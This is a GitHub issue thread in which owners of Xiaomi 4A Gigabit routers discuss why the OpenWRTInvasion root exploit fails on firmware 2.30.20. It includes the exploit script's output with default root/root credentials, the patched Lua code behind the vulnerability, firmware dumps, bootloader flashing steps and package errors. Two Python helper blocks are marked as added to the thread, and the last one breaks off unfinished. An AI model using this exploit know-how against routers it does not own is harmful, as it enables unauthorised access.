
Not working R4A (Xiaomi 4a Gigabit) 2.30.20 #141

Closed
teammate100 opened this issue Sep 1, 2022 · 95 comments

Comments

@teammate100

teammate100 commented Sep 1, 2022

Script appears to work, but ftp/ssh/telnet cannot connect.
However, it gets the stok automatically.
This is Ubuntu 20.04.3, completely stock.
I also tried with option 2 to download the needed files from the remote GitHub repository, no difference.

*Please note: Docker would not build correctly with either `docker` or `sudo docker`, so I git cloned OpenWRTInvasion and put my OpenWRT firmware in there.

```
$ python3 remote_command_execution_vulnerability.py
Router IP address [press enter for using the default 'miwifi.com']: 192.168.31.1
Enter router admin password: OpenWRTInvasion
There two options to provide the files needed for invasion:
   1. Use a local TCP file server runing on random port to provide files in local directory `script_tools`.
   2. Download needed files from remote github repository. (choose this option only if github is accessable inside router device.)
Which option do you prefer? (default: 1)1
****************
router_ip_address: 192.168.31.1
stok: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
file provider: local file server
****************
start uploading config file...
start exec command...
local file server is runing on 0.0.0.0:49557. root='script_tools'
done! Now you can connect to the router using several options: (user: root, password: root)
* telnet 192.168.31.1
* ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc -o UserKnownHostsFile=/dev/null root@192.168.31.1
* ftp: using a program like cyberduck
```

Then I try

```
telnet 192.168.31.1
```

But I get

```
telnet: connect to address 192.168.31.1: Connection refused
```

Same with ssh and ftp.

I assume this person had success with this version 2.30.20, but their advice isn't clear.
#135 (comment)

@acecilia
Owner

acecilia commented Sep 1, 2022

Seems your machine cannot connect to the router. I can't help much, as this depends on your network setup. My suggestion would be that you try to simplify your setup as much as possible.

@teammate100
Author

> Seems your machine cannot connect to the router. I can't help much, as this depends on your network setup. My suggestion would be that you try to simplify your setup as much as possible.

This is not the issue, because I have no problem connecting to the router with DHCP or a manual IP (192.168.31.2). The network is also working perfectly with the modem connected to WAN.
No WiFi used; this is a direct ethernet cable between the PC and the router.

I also tried power cycling the router several times and doing the script immediately upon bootup, no difference.

I also tried in Windows 10 with Docker, no difference.

My 4a Gigabit is manufactured 07/2022. Is there something I can check for you on the router itself?

@acecilia
Owner

acecilia commented Sep 1, 2022

> Is there something I can check for you on the router itself?

Not really :( I do not have access to a router to test it out; I do not think I can help.

@MosesCN

MosesCN commented Sep 5, 2022

Same situation: all works well until connecting to the router with telnet or ssh. Any solution? Thx

@Maxlinn

Maxlinn commented Sep 7, 2022

Same situation. I tried to invade with several versions of this tool, but none of them allowed me to connect through telnet.

I spent hours trying different versions. Other guys, don't waste time on it, it won't work.

I think I would get a refund on the router I bought; it disappointed me.

@acecilia
Owner

acecilia commented Sep 8, 2022

Version 3.0.10 is reported to work: #145

@acecilia
Owner

acecilia commented Sep 9, 2022

Added information to readme, thanks!

@tangmingxing1988
Contributor

tangmingxing1988 commented Sep 15, 2022

Maybe the security issue has been fixed officially. I uncommented the result of the upload code and got the following error:

```
start uploading config file... {"code":1629,"msg":"解压失败,可能文件已经损坏"}
```

Means "Couldn't unzip, the file is corrupt"

@LordPinhead

I've dumped the chip and will reverse engineer the differences and look for the reason and maybe a way to hack it again. The cgi-bin/upload file is the same; now I have to look at which file is executed for the c_upload API endpoint. The hack is pretty simple, as long as we get a few files on the router.

@mark4z

mark4z commented Sep 18, 2022

Any update?

@tangmingxing1988
Contributor

> I've dumped the chip and will reverse engineer the differences and look for the reason and maybe a way to hack it again. The cgi-bin/upload file is the same; now I have to look at which file is executed for the c_upload API endpoint. The hack is pretty simple, as long as we get a few files on the router.

I am afraid it's not about c_upload; maybe testing the net speed will not evaluate the command in the URL anymore, so it will be hard, or even impossible.

Anyway, it's my opinion. Good luck.

@LordPinhead

I will see what happens. If everything fails, we have to program the chip the hardcore way and downgrade it to a vulnerable firmware or OpenWrt directly.

@LordPinhead

LordPinhead commented Sep 19, 2022

So, I looked up what the vulnerable script was. It's /usr/bin/upload_speedtest, or was. The upload saved a file in /tmp/ named speedtest_urls.xml with the script, and /usr/bin/speedtest would execute the wget command, and that loaded the script. Sadly, the code changed.

From 2.28.69:

```lua
local cfg = {
....
['xmlfile'] = "/usr/share/speedtest.xml",
['tmp_speedtest_xml'] = "/tmp/speedtest_urls.xml",
}

local filename = ""
filexml = io.open(cfg.tmp_speedtest_xml)
if filexml then
filexml:close()
filename = cfg.tmp_speedtest_xml
else
filename = cfg.xmlfile
end
filename = cfg.xmlfile
```

To the new 2.30.20:

```lua
local cfg = {
....
['xmlfile'] = "/usr/share/speedtest.xml",
['tmp_speedtest_xml'] = "/tmp/speedtest_urls.xml",
}

local filename = ""
--filexml = io.open(cfg.tmp_speedtest_xml)
--if filexml then
-- filexml:close()
-- filename = cfg.tmp_speedtest_xml
--else
-- filename = cfg.xmlfile
--end
filename = cfg.xmlfile
```

And that's the reason the attack is not working anymore. (For non-coders: they no longer load the /tmp file; they use the internal file that is in the firmware, and we can't change that.)

I uploaded the bin dump of 2.30.20, and we could look for another bug, but ATM our best solution would be downgrading the router to a vulnerable version or directly installing OpenWRT with a programmer.

Extracted dump with Binwalk (on Linux, you need root or sudo -s)
https://drive.proton.me/urls/CGCNWSMQB0#bkj9NIVPIR06

Direct bin dump from the chip
https://drive.proton.me/urls/58Q1BHMN18#GKbX5gTA6XBS

I also tried to activate the serial console, but it refused the new parameters. Here is the serial console output:
https://drive.proton.me/urls/AF1Z9XA290#ct6pXZqm6ijn

Changed U-Boot env:

```
bootcmd=mtkautoboot bootdelay=9 stdin=serial stdout=serial stderr=serial flag_boot_rootfs=0 wl1_radio=1 model=R4AV2 mode=Router no_wifi_dev_times=0 boot_wait=on uart_en=0 telnet_en=1 CountryCode=CN color=101 ssh_en=0 nv_wan_type=static flag_boot_success=1 flag_try_sys1_failed=0 flag_try_sys2_failed=0 normal_firmware_md5=11b6c8523198ac50137219388168d79d flag_boot_type=2 flag_ota_reboot=0 flag_last_success=0 restore_defaults=0 Router_unconfigured=0
```

Telnet was activated but does nothing; bootdelay set to 9 seconds and boot_wait to on. But nope, no serial console working.
Does somebody have an old bin dump I could play with?

@tangmingxing1988
Contributor

> Does somebody have an old bin dump I could play with?

Thanks for your efforts, and I can't make it work for the serial console; so the boot delay won't let you download a file from TFTP?

@LordPinhead

> > Does somebody have an old bin dump I could play with?
>
> Thanks for your efforts, and I can't make it work for the serial console; so the boot delay won't let you download a file from TFTP?

Sadly no. First:

```
U-Boot 2018.09 (Feb 22 2022 - 03:57:56 +0000), Build: jenkins-common_router_openwrt_bash_ota_publish-73

CPU: MediaTek MT7621AT ver 1, eco 3
Clocks: CPU: 880MHz, DDR: 600MHz, Bus: 220MHz, XTAL: 40MHz
Model: MediaTek MT7621 reference board
DRAM: 128 MiB
pcie reset control...
gpio data reg:0xfffd601a
gpio data reg:0xfff5601e
gpio data reg:0xfffd601e
Loading Environment from SPI Flash... SF: Detected gd25q128b with page size 256 Bytes, erase size 64 KiB, total 16 MiB
*** Warning - bad CRC, using default environment

In: uartlite0@1e000c00
Out: uartlite0@1e000c00
Err: uartlite0@1e000c00
Net:
Warning: eth@1e100000 (eth0) using random MAC address - 82:73:78:2e:b6:69
eth0: eth@1e100000

restore_defaults:
boot_wait is off !
Booting System 1 @00xBFD80000
SF: Detected gd25q128b with page size 256 Bytes, erase size 64 KiB, total 16 MiB
bootargs: console=ttyS0,115200 uart_en=0 factory_mode=0 mem=128m
```

You see the "Warning - bad CRC"; this happens when I modify the bin dump and flash it onto the router and it boots.

I've tried to downgrade the firmware to various versions; every time, the router downloads the img from my PC and then says "nope, magic hex number wrong" and stops there.

I did not try a squash or root fs of OpenWRT though, but I guess it's the same issue.

ATM, I'm searching for some bugs. I found something about the config backup: it's encrypted with AES, but the key in /squash-fs/etc/config/cfgbackup is just a hint; I need the cipher and whether there is a key or a salt somewhere. The LUA files may have it, but I didn't find anything there yet. My hope is that I can inject code via the upload of a config.

But this will take some time. I'm unhappy myself; it's the second router in 2 weeks I can't get running with OpenWRT :(
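Added example, not from this thread or from OpenWRTInvasion: the "bad CRC, using default environment" line in the log above is U-Boot checking the CRC32 header of its environment block, so an env area edited by hand in a dump is discarded as a whole unless that header is recomputed. The Python below builds and verifies a non-redundant env block in the layout U-Boot reads (the same one `mkenvimage` writes); the variable set is a constructed subset of the env quoted earlier and the 0x1000 area size is an assumption, not this device's real partition size.

```python
import struct
import zlib

# Size of the env area is an assumption for this example; use the real
# partition size of your device, because the CRC covers the whole area.
ENV_SIZE = 0x1000

# Constructed subset of the env quoted earlier in the thread.
SAMPLE_VARS = {
    "bootcmd": "mtkautoboot",
    "bootdelay": "9",
    "boot_wait": "on",
    "uart_en": "0",
    "telnet_en": "1",
    "ssh_en": "0",
    "flag_boot_rootfs": "0",
}


def build_env(variables, env_size=ENV_SIZE):
    """Serialise a non-redundant U-Boot environment: a 4-byte little-endian
    CRC32 header, then NUL-terminated "key=value" entries, one extra NUL as
    end marker, and zero padding up to env_size. The CRC is computed over
    everything after the header, padding included. (A redundant env adds a
    1-byte flags field after the CRC; that layout is not handled here.)"""
    body = b"".join(f"{k}={v}".encode() + b"\0" for k, v in variables.items()) + b"\0"
    data_len = env_size - 4
    if len(body) > data_len:
        raise ValueError("environment does not fit into the env area")
    body = body.ljust(data_len, b"\0")
    return struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF) + body


def parse_env(blob):
    """Return (crc_ok, variables). crc_ok == False is exactly the case where
    U-Boot prints '*** Warning - bad CRC, using default environment' and
    ignores every variable in the block, telnet_en and boot_wait included."""
    (stored_crc,) = struct.unpack_from("<I", blob, 0)
    body = blob[4:]
    crc_ok = (zlib.crc32(body) & 0xFFFFFFFF) == stored_crc
    variables = {}
    for entry in body.split(b"\0"):
        if not entry:
            break  # empty entry marks the end of the environment
        key, _, value = entry.partition(b"=")
        variables[key.decode()] = value.decode()
    return crc_ok, variables


def set_variable(blob, key, value):
    """Change one variable and re-seal the block so the CRC is valid again."""
    _, variables = parse_env(blob)
    variables[key] = value
    return build_env(variables, len(blob))


if __name__ == "__main__":
    env = build_env(SAMPLE_VARS)
    print("fresh block:", parse_env(env)[0])              # True
    # Overwriting bytes in the dump without touching the header, as a hex editor would.
    patched = env.replace(b"bootdelay=9\0", b"bootdelay=3\0")
    print("byte-patched block:", parse_env(patched)[0])   # False -> "bad CRC"
    resealed = set_variable(env, "bootdelay", "3")
    print("resealed block:", parse_env(resealed)[0])      # True
```

Run `parse_env` on the env area cut out of a dump first: if it already reports a CRC mismatch before any edit, the offset or size assumed for the area is wrong rather than the edit.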

@tangmingxing1988
Contributor

tangmingxing1988 commented Sep 22, 2022

> But this will take some time. I'm unhappy myself; it's the second router in 2 weeks I can't get running with OpenWRT :(

I come here almost every day to see if there is any update. Waiting for your progress, my friend 👍

@mark4z

mark4z commented Sep 22, 2022

Me too

@tangmingxing1988
Contributor

To anyone who is interested, here is my last thought about this, and maybe it's wrong, just for advice:

The problem is not only about hacking into the system: the 5G chip has changed (now MT7613BEN), so the OpenWrt firmware is not suitable anymore. We not only need a new hacking way, but also new firmware.

@LordPinhead

That would suck, tbh, if the chip is not supported by the Linux kernel. We could ask in the OpenWrt forum for it, but so far I found no way around it. But I have more projects running; I can't put that much time into this.

Making a 21.x image with the kernel driver would be something V3 needs. But that's maybe the reason why downgrading the firmware did not work.

@RadioOperator

Where can I download the 2.30.20 factory firmware?
My 4AG is the 2.28.69 Chinese version, works with no problems.

@LordPinhead

So far, I didn't find a binary of it anywhere. I dumped my chip and that's it. But with the hardware changes, I guess you can't flash it back onto your chip.

@RadioOperator

Then 2.30.20 cannot be downgraded to 2.28.69?

@LordPinhead

I guess not, because I couldn't do it with any method I found. I tried the TFTP debricking version too. The box loads the image, but then stops and says "the magic number is wrong".
That's why I search for firmware errors to somehow get access.

Changing the binary image is not working, btw; I tried, and it recovered the default config. The bootloader is the problem here.

@RadioOperator

RadioOperator commented Sep 28, 2022

Then, could we re-flash the bootloader from a serial connection?
I can dump my 4AG bootloader bin code from OpenWrt (mtd0) for you.

@LordPinhead

I don't know. I have a chip programmer to do it; you can also test my dump on your chip, but you can also put a chip dump somewhere for me and I'll try it.

@RadioOperator

I just flashed my 4AG from OpenWrt back to the factory image via TFTP server; it failed on v3.0.24 (File too large! / Header check error! / Image verify failed! / ========Upgrade fail!======== ).

But it succeeded on v2.28.69, then using OpenWRTInvasion was OK!

@mark4z

mark4z commented Nov 9, 2022

> > @MrTaiKe R4AG V2 uses the same breed firmware as R4AG V1; it's breed-mt7621-pbr-m1.bin
>
> Thanks for your suggestion. My device is Xiaomi 4A Gigabit (2.30.20). First, I downloaded the code with the link here and successfully got the console via WSL in Windows. Then I used MobaXterm to upload breed-mt7621-pbr-m1.bin to the path /tmp. Finally, I used the command `mtd -r write /tmp/breed.bin Bootloader`. After a while, my device turned to a faint blue light and the ports are unresponsive; it must be broken. (sad) I have referred to the tutorials Links
>
> Do you know the reason for the failure to flash the breed? I have backed up the original system of the router and plan to use the hardware programmer when I have time.

This breed broke your LEDs, so it's always a faint blue light, but do not worry; just try 192.168.1.1 to enter the breed GUI.

@MrTaiKe

MrTaiKe commented Nov 9, 2022

@mark4z @fengjiaqi927
I rewrote my readme.md; probably a better instruction to follow.
https://github.com/MrTaiKe/Action_OpenWrt_Xiaomi_R4AGv2

R4AGv2 working OpenWrt bin file (except LED lights)
Download build (wetransfer.com): https://we.tl/t-wUdXMxjDBz
or
Release Bin file

@fengjiaqi927, mark4z is right: the BREED GUI is at 192.168.1.1, the OpenWrt GUI is at 192.168.31.1. You are confused with the addresses.

@MrTaiKe

MrTaiKe commented Nov 9, 2022

The Xiaomi R4AGv2 router seems to be working with the OpenWrt bin, but the LED lights are not working properly. Always faint blue lights turned on.....

Does anyone know how to fix this issue?

@fengjiaqi927

fengjiaqi927 commented Nov 9, 2022

> > > @MrTaiKe R4AG V2 uses the same breed firmware as R4AG V1; it's breed-mt7621-pbr-m1.bin
> >
> > Thanks for your suggestion. My device is Xiaomi 4A Gigabit (2.30.20). First, I downloaded the code with the link here and successfully got the console via WSL in Windows. Then I used MobaXterm to upload breed-mt7621-pbr-m1.bin to the path /tmp. Finally, I used the command `mtd -r write /tmp/breed.bin Bootloader`. After a while, my device turned to a faint blue light and the ports are unresponsive; it must be broken. (sad) I have referred to the tutorials Links
> > Do you know the reason for the failure to flash the breed? I have backed up the original system of the router and plan to use the hardware programmer when I have time.
>
> This breed broke your LEDs, so it's always a faint blue light, but do not worry; just try 192.168.1.1 to enter the breed GUI.

Thanks! @MrTaiKe and @mark4z. You saved my life!!!! The gateway changed from 192.168.31.1 to 192.168.1.1!
Although after entering the command ipconfig in the Windows cmd, there is no gateway on the eth.

[screenshot]

By the way, the password of the new image openwrt-ramips-mt7621-xiaomi_mi-router-4a-gigabit-v2-squashfs-sysupgrade.bin is `password`.

I want to download luci-app-bypass for the .bin you provided, but the kernel version is mismatched. Can you build one for me if this problem is easy for you? I do not know how to build...... @MrTaiKe
I have put this job on the TODO list; once I succeed, I will upload the new firmware image for the community~~~

```
Installing luci-app-bypass (git-23.303.44828-ba42a9a) to root...
Downloading https://op.supes.top/packages/mipsel_24kc/kiddin9/luci-app-bypass_git-23.303.44828-ba42a9a_all.ipk
Collected errors:
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-nf-reject
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-nf-ipt
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-nf-log
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-ipt-core
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-nfnetlink
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-ipt-ipset
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-nf-conntrack
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-nf-nat
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-ipt-nat
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-nf-tproxy
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-ipt-tproxy
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.146-1-1) for kmod-nf-conntrack-netlink
 * opkg_download: Failed to download https://op.supes.top/packages/mipsel_24kc/kiddin9/luci-app-bypass_git-23.303.44828-ba42a9a_all.ipk, wget returned 4.
 * opkg_download: Check your network settings and connectivity.
 * opkg_install_pkg: Failed to download luci-app-bypass. Perhaps you need to run 'opkg update'?
 * opkg_install_cmd: Cannot install package luci-app-bypass.
```

The kernel information of the firmware is shown below:

```
root@R4AGv2:~# uname -a
Linux R4AGv2 5.4.216 #0 SMP Sun Oct 9 02:46:49 2022 mips GNU/Linux
```

@MrTaiKe

MrTaiKe commented Nov 9, 2022

@fengjiaqi927, the world should be better when people can help each other! 👍 I am new to OpenWrt and I spent a lot of time trying to figure things out. That is painful. Letting a Taiwanese fellow help out a bit is no big deal 😊. Best luck to you!
(Please star my repositories if it helps) lol

@MrTaiKe

MrTaiKe commented Nov 10, 2022

@fengjiaqi927 I compiled a minimal version with luci-app-bypass. It took almost 3 hours. I am not sure why there is no sysupgrade bin, but there is also an ipk of luci-app-bypass. Perhaps you can still find it useful for now. Give it a try and let me know. https://github.com/MrTaiKe/Action_OpenWrt_Xiaomi_R4AGv2/actions/runs/3435975079 Hope it helps!

(NOTE: I guess that I loaded too many themes, causing the image to be too big to produce sysupgrade.bin)

@fengjiaqi927

fengjiaqi927 commented Nov 11, 2022

> @fengjiaqi927 I compiled a minimal version with luci-app-bypass. It took almost 3 hours. I am not sure why there is no sysupgrade bin, but there is also an ipk of luci-app-bypass. Perhaps you can still find it useful for now. Give it a try and let me know. https://github.com/MrTaiKe/Action_OpenWrt_Xiaomi_R4AGv2/actions/runs/3435975079 Hope it helps!
>
> (NOTE: I guess that I loaded too many themes, causing the image to be too big to produce sysupgrade.bin)

@MrTaiKe Thanks for your luci-app-bypass.ipk

I opened Internet Information Services on my Windows 10 and put the packages you provided in the wwwroot dir.
Then I added the local packages to the opkg configs like this:
(192.168.31.227 is my Windows 10's IP)

```
src/gz local_base http://192.168.31.227/base
src/gz local_luci http://192.168.31.227/luci
src/gz local_packages http://192.168.31.227/packages
src/gz local_routing http://192.168.31.227/routing
src/gz local_small8 http://192.168.31.227/small8
src/gz local_telephony http://192.168.31.227/telephony
```

Then I use `opkg update`:

```
root@R4AGv2:~# opkg update
Downloading http://192.168.31.227/base/Packages.gz
Updated list of available packages in /var/opkg-lists/local_base
Downloading http://192.168.31.227/luci/Packages.gz
Updated list of available packages in /var/opkg-lists/local_luci
Downloading http://192.168.31.227/packages/Packages.gz
Updated list of available packages in /var/opkg-lists/local_packages
Downloading http://192.168.31.227/routing/Packages.gz
Updated list of available packages in /var/opkg-lists/local_routing
Downloading http://192.168.31.227/small8/Packages.gz
Updated list of available packages in /var/opkg-lists/local_small8
Downloading http://192.168.31.227/telephony/Packages.gz
Updated list of available packages in /var/opkg-lists/local_telephony
Downloading https://mirrors.cloud.tencent.com/lede/snapshots/targets/ramips/mt7621/packages/Packages.gz
Updated list of available packages in /var/opkg-lists/openwrt_core
Downloading https://mirrors.cloud.tencent.com/lede/snapshots/packages/mipsel_24kc/base/Packages.gz
Updated list of available packages in /var/opkg-lists/openwrt_base
Downloading https://mirrors.cloud.tencent.com/lede/releases/18.06.9/packages/mipsel_24kc/luci/Packages.gz
Updated list of available packages in /var/opkg-lists/openwrt_luci
Downloading https://mirrors.cloud.tencent.com/lede/snapshots/packages/mipsel_24kc/packages/Packages.gz
Updated list of available packages in /var/opkg-lists/openwrt_packages
Downloading https://mirrors.cloud.tencent.com/lede/snapshots/packages/mipsel_24kc/routing/Packages.gz
Updated list of available packages in /var/opkg-lists/openwrt_routing
Downloading https://mirrors.cloud.tencent.com/lede/snapshots/packages/mipsel_24kc/small8/Packages.gz
*** Failed to download the package list from https://mirrors.cloud.tencent.com/lede/snapshots/packages/mipsel_24kc/small8/Packages.gz

Downloading https://mirrors.cloud.tencent.com/lede/snapshots/packages/mipsel_24kc/telephony/Packages.gz
Updated list of available packages in /var/opkg-lists/openwrt_telephony
Collected errors:
 * opkg_download: Failed to download https://mirrors.cloud.tencent.com/lede/snapshots/packages/mipsel_24kc/small8/Packages.gz, wget returned 8.
```

(The mirror source does not have this file, but it seems to have no effect; ignore the error)

Then I use `opkg install luci-app-bypass`:

```
opkg install luci-app-bypass
Multiple packages (libgcc1 and libgcc1) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libgcc1 and libgcc1) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libstdcpp6 and libstdcpp6) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libstdcpp6 and libstdcpp6) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libstdcpp6 and libstdcpp6) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libstdcpp6 and libstdcpp6) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (librt and librt) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libstdcpp6 and libstdcpp6) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libstdcpp6 and libstdcpp6) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (librt and librt) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libstdcpp6 and libstdcpp6) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libstdcpp6 and libstdcpp6) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (librt and librt) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libgcc1 and libgcc1) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libatomic1 and libatomic1) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libatomic1 and libatomic1) providing same name marked HOLD or PREFER. Using latest.
Multiple packages (libpthread and libpthread) providing same name marked HOLD or PREFER. Using latest.
Unknown package 'luci-app-bypass'.
Collected errors:
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-reject
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-ipt
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-log
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-ipt-core
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.4.223-1-7e84cb65f8ad7cb4586d025ab933230d) for kmod-nfnetlink
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.4.223-1-7e84cb65f8ad7cb4586d025ab933230d) for kmod-ipt-ipset
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-conntrack
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-nat
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-ipt-nat
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-tproxy
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-ipt-tproxy
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.4.223-1-7e84cb65f8ad7cb4586d025ab933230d) for kmod-nf-conntrack-netlink
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-reject6
 * pkg_hash_fetch_best_installation_candidate: Packages for kmod-nf-reject6 found, but incompatible with the architectures configured
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.4.223-1-7e84cb65f8ad7cb4586d025ab933230d) for kmod-nf-conntrack6
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-log6
 * pkg_hash_fetch_best_installation_candidate: Packages for kmod-nf-log6 found, but incompatible with the architectures configured
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-crypto-hash
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-crypto-crc32c
 * pkg_hash_fetch_best_installation_candidate: Packages for kmod-crypto-crc32c found, but incompatible with the architectures configured
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-lib-crc32c
 * pkg_hash_fetch_best_installation_candidate: Packages for kmod-lib-crc32c found, but incompatible with the architectures configured
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nft-core
 * pkg_hash_fetch_best_installation_candidate: Packages for kmod-nft-core found, but incompatible with the architectures configured
 * pkg_hash_check_unresolved: cannot find dependency redsocks2 for luci-app-bypass
 * pkg_hash_fetch_best_installation_candidate: Packages for luci-app-bypass found, but incompatible with the architectures configured
 * opkg_install_cmd: Cannot install package luci-app-bypass.
```

I searched the dependency packages in the local source you provided; the kernel version is 5.4.223, which mismatches the needed kernel version 5.10.153.

[screenshot]

I have no idea how to solve this error. I will try to build a firmware myself. Could you teach me how to build an R4AGv2 image with passwall.ipk?
I plan to refer to the link below to learn the operation process, but I don't know how to combine it with the existing 4A configuration file.
xiaorouji/openwrt-passwall#1603
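Added example (Python; not from this thread or from any of the repositories linked in it): it parses opkg's "Collected errors" output like the one quoted above and separates kernel-version mismatches from genuinely missing packages, which is the diagnosis done by hand in this comment. The sample log is a constructed excerpt of the output quoted above, and the installed kernel is taken from the `uname -a` line posted earlier; note that OpenWrt kmod packages pin `kernel (= version-release-vermagic)`, so even a matching base version with a different vermagic hash is rejected.

```python
import re
from collections import defaultdict

# Constructed excerpt of the opkg output quoted earlier in this comment.
SAMPLE_OPKG_OUTPUT = """\
Unknown package 'luci-app-bypass'.
Collected errors:
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-nf-reject
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.10.153-1-3641e105961a8c8c194b6873c53dc69b) for kmod-ipt-core
 * pkg_hash_check_unresolved: cannot find dependency kernel (= 5.4.223-1-7e84cb65f8ad7cb4586d025ab933230d) for kmod-nfnetlink
 * pkg_hash_check_unresolved: cannot find dependency redsocks2 for luci-app-bypass
 * pkg_hash_fetch_best_installation_candidate: Packages for luci-app-bypass found, but incompatible with the architectures configured
 * opkg_install_cmd: Cannot install package luci-app-bypass.
"""

# Matches: cannot find dependency <dep> [(= <exact version>)] for <package>
DEP_RE = re.compile(
    r"cannot find dependency (?P<dep>\S+)(?: \(= (?P<ver>[^)]+)\))? for (?P<pkg>\S+)"
)


def parse_kernel_version(version):
    """Split 'base-release-vermagic' as used by OpenWrt's kernel package:
    '5.10.153-1-3641e1...' -> ('5.10.153', '1', '3641e1...')
    '5.4.216' (what `uname -r` prints) -> ('5.4.216', None, None)"""
    parts = version.split("-", 2)
    parts += [None] * (3 - len(parts))
    return tuple(parts)


def kernel_compatible(required, installed):
    """A kmod installs only when the kernel package version matches exactly.
    Fields unknown on the installed side (only `uname -r` at hand) cannot be
    checked; fields known on both sides must be identical."""
    req = parse_kernel_version(required)
    inst = parse_kernel_version(installed)
    if req[0] != inst[0]:
        return False
    return all(r == i for r, i in zip(req[1:], inst[1:])
               if r is not None and i is not None)


def unresolved_dependencies(opkg_output):
    """Return [(dependency, exact_version_or_None, package)] for every
    pkg_hash_check_unresolved line in the output."""
    return [(m["dep"], m["ver"], m["pkg"])
            for m in map(DEP_RE.search, opkg_output.splitlines()) if m]


def diagnose(opkg_output, installed_kernel):
    """Split unresolved dependencies into kernel mismatches (the feed was
    built for another kernel than the flashed image) and other missing
    packages (absent from every configured feed)."""
    kernel_mismatch = defaultdict(list)
    other_missing = defaultdict(list)
    for dep, ver, pkg in unresolved_dependencies(opkg_output):
        if dep == "kernel" and ver and not kernel_compatible(ver, installed_kernel):
            kernel_mismatch[ver].append(pkg)
        else:
            other_missing[dep].append(pkg)
    return {"kernel_mismatch": dict(kernel_mismatch),
            "other_missing": dict(other_missing)}


if __name__ == "__main__":
    # "Linux R4AGv2 5.4.216 ..." is the uname line posted in this comment
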